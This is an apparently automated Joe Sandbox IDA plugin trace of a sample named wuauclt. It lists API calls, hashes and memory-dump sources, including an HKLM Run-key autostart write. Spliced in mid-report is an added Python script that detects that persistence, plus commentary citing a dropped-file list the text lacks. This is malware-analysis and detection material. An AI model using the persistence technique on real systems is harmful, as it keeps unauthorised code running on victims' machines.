Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_540000_wuauclt.jbxd
Similarity
• API ID: ChangeCloseCreateFindMutexNotification
• String ID: $CT$HCT
• API String ID: 2967213129-72007170
• Opcode ID: c86217b52a9a5dd126fb4d416871ea2ea62c1809a1e2308bb043aeccabdd6982
• Instruction ID: 40b3ad234d52e71ef9c1452f9cc6282dc1abfef32452a0dea914cff4cb9769f9
• Opcode Fuzzy Hash: c86217b52a9a5dd126fb4d416871ea2ea62c1809a1e2308bb043aeccabdd6982
• Instruction Fuzzy Hash: 5F219234550624BBC7259FA29C4CDFF3EBDFBA7B9DB50481AF10AD2110DB208884EA74
APIs
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 004383ED
• VirtualProtect.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 00438509
Strings
Memory Dump Source
• Source File: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: Virtual$FreeProtect
• String ID: @O:r
• API String ID: 2581862158-1513391029
• Opcode ID: 62998878eee791b55a4525ffa1200409ee62ec3c0713ca06769709f58399dcba
• Instruction ID: 1c248bd57497abf13f7211ff5bbec31fcd2e4003a81eef7960cbaa05da7696eb
• Opcode Fuzzy Hash: 62998878eee791b55a4525ffa1200409ee62ec3c0713ca06769709f58399dcba
• Instruction Fuzzy Hash: D25139322043169FE7258B18CC907E6F7A1EF99314F38506EF9498B781EB79AC42CB54
APIs
• VirtualAlloc.KERNEL32(00000000,0000116C,00001000,00000004), ref: 005F00A2
Strings
Memory Dump Source
• Source File: 00000004.00000003.2045966344.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_3_5f0000_wuauclt.jbxd
Similarity
• API ID: AllocVirtual
• String ID: -
• API String ID: 4275171209-2547889144
• Opcode ID: e4a18ab6a6c0e9bdc92e7bbfef9058a5b763e4d299425c6ffac95ad41b1d133a
• Instruction ID: bfa91402dd58f6c0a63bb1b938226b750da621d7fde6486358b4766ab6877618
• Opcode Fuzzy Hash: e4a18ab6a6c0e9bdc92e7bbfef9058a5b763e4d299425c6ffac95ad41b1d133a
• Instruction Fuzzy Hash: 5C2103716483055FD314CA54C809F7BBBD8EBD8310F488A2CFA959B2C2D779A809C762
APIs
• CreateFileA.KERNEL32(?,C0000000,?,00000000,00000002,00000080,00000000,?,00000000,?,00402FAB,00406977,00000000,00406C22), ref: 00402F4B
• GetStdHandle.KERNEL32(000000F5,?,00000000,?,00402FAB,00406977,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402F6B
• GetLastError.KERNEL32(000000F5,?,00000000,?,00402FAB,00406977,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402F7F
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: CreateErrorFileHandleLast
• String ID:
• API String ID: 1572049330-0
• Opcode ID: 1fe4482e51c97fcd3ab156c21462874b1d18ea82579e8d9af765361da5b48797
• Instruction ID: 8895028cb5cdc15445adb39e81ddeb6a4987250684acebc896c500d1f95e65c5
• Opcode Fuzzy Hash: 1fe4482e51c97fcd3ab156c21462874b1d18ea82579e8d9af765361da5b48797
• Instruction Fuzzy Hash: 4A11086120010296E7149F59CA8C71765649F84358F28C37BE8097F3E6D6FCCC85939D
                                                                            APIs
                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteOpenValue
                                                                            • String ID:
                                                                            • API String ID: 849931509-0
                                                                            • Opcode ID: f6903086ebc016dd7e1dc51a1f88265785295860ed41db1915025e2c118f5eb5
                                                                            • Instruction ID: 2826a8d518f421b74224b4c9e13106b3c01b6d5214c42722886c747e2e10fd3a
                                                                            • Opcode Fuzzy Hash: f6903086ebc016dd7e1dc51a1f88265785295860ed41db1915025e2c118f5eb5
                                                                            • Instruction Fuzzy Hash: F801E1B0A04204AFDB40FFA9D84295EBBFCEF48704F5044BAB504F3691DA38DA009628
                                                                            APIs
                                                                              • Part of subcall function 00404BFC: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,00000000,00404C35,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C0C
                                                                            • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C7F
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Close$OpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 1607946009-0
                                                                            • Opcode ID: de490e853962903b2a5689227c4e63d122a59ebf74e7772f1ca70b50c0b4eacb
                                                                            • Instruction ID: 4b701f08789f1177e28b55cf3da9d2e9372874710ef882e2c23d1ca645a241ff
                                                                            • Opcode Fuzzy Hash: de490e853962903b2a5689227c4e63d122a59ebf74e7772f1ca70b50c0b4eacb
                                                                            • Instruction Fuzzy Hash: 56F049F160421866D700EB958C81FDE777C9B44354F0041ABBA45F7282D6789F408BE9
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 004012FF
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001), ref: 00401326
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree
                                                                            • String ID: Hh
                                                                            • API String ID: 2087232378-2683877627
                                                                            • Opcode ID: 4b50bbdd818b043b9c2eceaba266390bd427f996ac06b58da068fb7d09c7efa8
                                                                            • Instruction ID: d870f39221132c547acdf604606a3f6d37415c35f40f0878f1ff510f596d474e
                                                                            • Opcode Fuzzy Hash: 4b50bbdd818b043b9c2eceaba266390bd427f996ac06b58da068fb7d09c7efa8
                                                                            • Instruction Fuzzy Hash: 82F02772B0023067EB20696E0C85B4366D59F49790F14407AFF08FF3E9D6B98C0042A9
                                                                            APIs
                                                                            • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00404AED
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00404AEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                            • API String ID: 2289755597-1428018034
                                                                            • Opcode ID: 5b4352bfc4d5184ded5f790e2a42e1a0fdd6f660e7ca3fdf0ef6e17b68d8ca19
                                                                            • Instruction ID: f4ecd25457bc41be08a6e23874f29c63b64927a4b92a18da8b30fdf3cb70f2a0
                                                                            • Opcode Fuzzy Hash: 5b4352bfc4d5184ded5f790e2a42e1a0fdd6f660e7ca3fdf0ef6e17b68d8ca19
                                                                            • Instruction Fuzzy Hash: 39D05EB235C30079E31D96548C43FBA73949794F10F20461EB3A66A1C0DAB07504961D
                                                                            APIs
                                                                              • Part of subcall function 004017B8: RtlInitializeCriticalSection.NTDLL(0040A5B0), ref: 004017CE
                                                                              • Part of subcall function 004017B8: RtlEnterCriticalSection.NTDLL(0040A5B0), ref: 004017E1
                                                                              • Part of subcall function 004017B8: LocalAlloc.KERNEL32(00000000,00000FF8,00000000,0040186E,?,?,00402052), ref: 0040180B
                                                                              • Part of subcall function 004017B8: RtlLeaveCriticalSection.NTDLL(0040A5B0), ref: 00401868
                                                                            • RtlEnterCriticalSection.NTDLL(0040A5B0), ref: 00401EEF
                                                                            • RtlLeaveCriticalSection.NTDLL(0040A5B0), ref: 0040201A
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                            • String ID:
                                                                            • API String ID: 2227675388-0
                                                                            • Opcode ID: 32418cc02c7f1d29882404eab4bca1a01f19dee915ec94e5af37ae9c171b391f
                                                                            • Instruction ID: 7ab3c8591ec623e826adcf2655e4b272feddf0c7b2dc2105d49059c53a0b74ec
                                                                            • Opcode Fuzzy Hash: 32418cc02c7f1d29882404eab4bca1a01f19dee915ec94e5af37ae9c171b391f
                                                                            • Instruction Fuzzy Hash: 2141CDB1A003019FD714CF28DE81A2A77B0FB48318B19827FD445A73F1E7399891CB49
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 00401410
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID: Hh
                                                                            • API String ID: 1263568516-2683877627
                                                                            • Opcode ID: 3a89578715c780a72c9bcc2f7238351524d5baf693c614b1e8794c1720b1a924
                                                                            • Instruction ID: 1e9abf7fae11d483954ba497bcecb7b42a35322519b3fee74413ce08071db684
                                                                            • Opcode Fuzzy Hash: 3a89578715c780a72c9bcc2f7238351524d5baf693c614b1e8794c1720b1a924
                                                                            • Instruction Fuzzy Hash: CC21F970608711AFD710DF19D88065BBBE4EF85720F14C92AE4989B3A1D378EC41CB5A
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00402B26
                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00402B2D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastRead
                                                                            • String ID:
                                                                            • API String ID: 1948546556-0
                                                                            • Opcode ID: 8f9e5a5cc88b9b448b3ca2ccaa60d9936ffcce192d438f27d05647225e30c127
                                                                            • Instruction ID: a1f473cf3bc07306b130f529efb15ea380eb81567c08e13a342af83bccae4885
                                                                            • Opcode Fuzzy Hash: 8f9e5a5cc88b9b448b3ca2ccaa60d9936ffcce192d438f27d05647225e30c127
                                                                            • Instruction Fuzzy Hash: E611FE71A00109EFDB40DF69CA45A9EB7F8EF58350B108477E808EB2C0E6B4EE009765
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,?,00003FFF,0040175F), ref: 00401552
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID: Hh
                                                                            • API String ID: 1263568516-2683877627
                                                                            • Opcode ID: 5a288f3db3f787fd20fc88d3d5c71f120b612570d67012e4ddc5ad127cebd5a4
                                                                            • Instruction ID: 909510ce892baa7c9b48256ed29b6e7cd33d2823f62f9fa2e1c19f749eef1782
                                                                            • Opcode Fuzzy Hash: 5a288f3db3f787fd20fc88d3d5c71f120b612570d67012e4ddc5ad127cebd5a4
                                                                            • Instruction Fuzzy Hash: 7C01F7726443146FC310DE28DCC092A77A4EBC5364F15053EDA86AB3A1E63AAC0187A9
                                                                            APIs
                                                                              • Part of subcall function 00404ACC: RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00404AED
                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateValue
                                                                            • String ID:
                                                                            • API String ID: 1818849710-0
                                                                            • Opcode ID: 02498e25f307462e858126ebec8e97115087d473417d076f46eb1ea06791e8cc
                                                                            • Instruction ID: da0817da91744ea337fddb203b8369e77bf46fb650e87780acf5a1fbdeaccc1d
                                                                            • Opcode Fuzzy Hash: 02498e25f307462e858126ebec8e97115087d473417d076f46eb1ea06791e8cc
                                                                            • Instruction Fuzzy Hash: B5F068B06042087FD711AFA59C92E9EBBBCEB85718F5040BEB604B32D1DA786E11855C
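In the CloseCreateValue block above, the subcall at 00404ACC reaches RegCreateKeyExA with hKey 80000002 (HKEY_LOCAL_MACHINE) and samDesired 000F003F (KEY_ALL_ACCESS) on Software\Microsoft\Windows\CurrentVersion\Run, and the caller then issues RegSetValueExA with dwType 00000001 (REG_SZ): a machine-wide autostart entry, which only succeeds when the process can write HKLM. The CloseDeleteOpenValue block (RegOpenKeyA, RegDeleteValueA) is the matching removal path. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses API lines in the exact format printed on this page, decodes the registry constants, and flags an open or create of an autostart key with KEY_SET_VALUE that is followed by RegSetValueExA in the same function block. Two assumptions are marked in comments: stack slots beyond a Win32 prototype's parameter count are treated as leftovers and ignored, and the sample lines are constructed copies of the page's own API lines.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed samples copied from the "APIs" lines on this page: the persistence
# function (subcall 00404ACC plus its caller) and the RegQueryValueExA function.
PERSISTENCE_BLOCK = r"""
• Part of subcall function 00404ACC: RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00404AED
• RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
• RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
""".strip().splitlines()

QUERY_BLOCK = r"""
• Part of subcall function 00404BFC: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,00000000,00404C35,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C0C
• RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
""".strip().splitlines()

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Parameter names from the Win32 prototypes. Tokens past the prototype length are
# treated as stack leftovers (return addresses, caller frames) and kept separately;
# that is an assumption about the plugin's stack dump, not a statement of the report.
PROTOTYPES = {
    "RegCreateKeyExA": ["hKey", "lpSubKey", "Reserved", "lpClass", "dwOptions",
                        "samDesired", "lpSecurityAttributes", "phkResult", "lpdwDisposition"],
    "RegOpenKeyExA": ["hKey", "lpSubKey", "ulOptions", "samDesired", "phkResult"],
    "RegOpenKeyA": ["hKey", "lpSubKey", "phkResult"],
    "RegSetValueExA": ["hKey", "lpValueName", "Reserved", "dwType", "lpData", "cbData"],
    "RegQueryValueExA": ["hKey", "lpValueName", "lpReserved", "lpType", "lpData", "lpcbData"],
    "RegDeleteValueA": ["hKey", "lpValueName"],
    "RegCloseKey": ["hKey"],
}
HKEY = {0x80000000: "HKCR", 0x80000001: "HKCU", 0x80000002: "HKLM",
        0x80000003: "HKU", 0x80000005: "HKCC"}
KEY_RIGHTS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
              0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK"}
KEY_ALL_ACCESS = 0x000F003F
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}
AUTOSTART_KEYS = ("software\\microsoft\\windows\\currentversion\\run",
                  "software\\microsoft\\windows\\currentversion\\runonce")

@dataclass
class ApiCall:
    api: str
    module: str
    ref: str
    subcall: Optional[str]
    args: dict = field(default_factory=dict)
    extra: list = field(default_factory=list)

def _value(tok):
    """Plugin tokens are 8-hex-digit dwords, '?' for unresolved, or an inline string."""
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok

def parse_line(line):
    """Parse one '• Api.MODULE(args), ref: addr' line; None if it is not an API line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    tokens = [t.strip() for t in m["args"].split(",")] if m["args"] else []
    names = PROTOTYPES.get(m["api"], [])
    call = ApiCall(m["api"], m["mod"], m["ref"], m["sub"])
    call.args = {n: _value(t) for n, t in zip(names, tokens)}
    call.extra = [_value(t) for t in tokens[len(names):]]
    return call

def decode_sam(mask):
    """Render a registry access mask with the KEY_* names it contains."""
    if mask is None:
        return "?"
    if mask == KEY_ALL_ACCESS:
        return "KEY_ALL_ACCESS"
    return "|".join(n for bit, n in KEY_RIGHTS.items() if mask & bit) or hex(mask)

def find_run_key_persistence(lines):
    """Flag open/create of an autostart key with KEY_SET_VALUE followed by RegSetValueExA.
    A key path that is only a pointer (dword) at analysis time is not matched: the
    string is not visible statically, so it is reported as nothing, not as benign."""
    calls = [c for c in map(parse_line, lines) if c]
    findings = []
    for i, c in enumerate(calls):
        if c.api not in ("RegCreateKeyExA", "RegOpenKeyExA"):
            continue
        sub = c.args.get("lpSubKey")
        if not isinstance(sub, str) or sub.lower() not in AUTOSTART_KEYS:
            continue
        sam = c.args.get("samDesired") or 0
        if not sam & 0x2:            # no KEY_SET_VALUE: a read-only open, not persistence
            continue
        setv = next((s for s in calls[i + 1:] if s.api == "RegSetValueExA"), None)
        if setv is None:
            continue
        findings.append({
            "hive": HKEY.get(c.args["hKey"], hex(c.args["hKey"])), "key": sub,
            "access": decode_sam(sam), "create_ref": c.ref, "in_subcall": c.subcall,
            "value_type": REG_TYPES.get(setv.args.get("dwType"), "?"), "set_ref": setv.ref,
        })
    return findings

if __name__ == "__main__":
    for f in find_run_key_persistence(PERSISTENCE_BLOCK):
        print(f)
```

Run against the CloseCreateValue block the script reports one HKLM Run-key write of a REG_SZ value (create at 00404AED inside 00404ACC, set at 00404B3D); run against the Close$OpenQueryValue block it reports nothing, because that RegOpenKeyExA receives its subkey as a pointer (00000000) that the static dump cannot resolve. On a live host the corresponding check is to list the values under HKLM\Software\Microsoft\Windows\CurrentVersion\Run and compare each command line against the dropped-file list earlier in this report.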
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00402B26
                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00402B2D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastRead
                                                                            • String ID:
                                                                            • API String ID: 1948546556-0
                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040283F
                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00402848
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
